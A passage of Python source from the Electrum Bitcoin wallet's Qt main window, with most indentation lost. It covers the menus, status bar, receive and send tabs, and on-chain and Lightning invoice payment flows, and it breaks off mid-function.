wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Lightning Network"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter="",
*, default_extension: str = None,
default_filter: str = None) -> Optional[str]:
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, filename)
file_dialog = QFileDialog(self, title, path, filter)
file_dialog.setAcceptMode(QFileDialog.AcceptSave)
if default_extension:
# note: on MacOS, the selected filter's first extension seems to have priority over this...
file_dialog.setDefaultSuffix(default_extension)
if default_filter:
assert default_filter in filter, f"default_filter={default_filter!r} does not appear in filter={filter!r}"
file_dialog.selectNameFilter(default_filter)
if file_dialog.exec() != QDialog.Accepted:
return None
selected_path = file_dialog.selectedFiles()[0]
if selected_path and directory != os.path.dirname(selected_path):
self.config.set_key('io_dir', os.path.dirname(selected_path), True)
return selected_path
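    # Hedged usage sketch (hypothetical file name/filter): both wrappers persist
    # the chosen directory under the 'io_dir' config key, so the next dialog
    # opens wherever the user last browsed:
    #
    #     path = self.getSaveFileName(_("Export history"), "history.csv", "*.csv")
    #     if path:
    #         ...  # write the file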
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return self.config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.config.format_amount_and_units(amount)
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
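        # The `follows` flags below break the feedback loop between the two
        # amount fields: while one edit is being updated programmatically from
        # the other, its textChanged handler returns early instead of writing
        # back and re-triggering the first edit.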
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.lnworker:
l = self.wallet.lnworker.get_balance()
text += u' \U0001f5f2 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
            self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
        self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
        # also wire up the send-tab amount fields here; this relies on
        # create_send_tab() having been called before create_receive_tab()
        self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
        self.expires_label.setReadOnly(True)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('Request'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('On-chain'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
self.address_list.update()
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
        if title is None:
            tooltip_text = _("Text copied to clipboard")
        else:
            tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r.id + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
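            # (QR alphanumeric mode only covers digits, upper-case letters and a
            # few symbols, which is why the bech32 string is upper-cased first.)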
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
        completer.setCaseSensitivity(Qt.CaseInsensitive)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay"), self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs) as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({repr(err.exc)})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, amount_sat: int):
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
self.wallet.lnworker.pay(invoice, amount_sat, attempts=attempts)
self.do_clear()
self.wallet.thread.add(task)
self.invoice_list.update()
def on_request_status(self, key, status):
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
def on_invoice_status(self, key):
req = self.wallet.get_invoice(key)
if req is None:
return
self.invoice_list.update_item(key, req)
def on_payment_succeeded(self, key, description=None):
self.show_message(_('Payment succeeded'))
self.need_update.set()
def on_payment_failed(self, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.lnworker:
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.amount is None:
amount = self.amount_e.get_amount()
if amount:
invoice.amount = amount
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.invoice_list.update()
self.do_clear()
self.do_pay_invoice(invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice):
if invoice.type == PR_TYPE_LN:
self.pay_lightning_invoice(invoice.invoice, invoice.amount)
elif invoice.type == PR_TYPE_ONCHAIN:
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
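    # Caller sketch (mirrors get_coins above): None means "no manual selection,
    # fall back to all spendable coins", while an empty sequence means the user
    # explicitly selected nothing and must not be silently overridden:
    #
    #     coins = self.get_manually_selected_coins()
    #     if coins is None:
    #         coins = self.wallet.get_spendable_coins(None, nonlocal_only=False)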
def pay_onchain_dialog(self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
return
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if d.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not d.have_enough_funds_assuming_zero_fees():
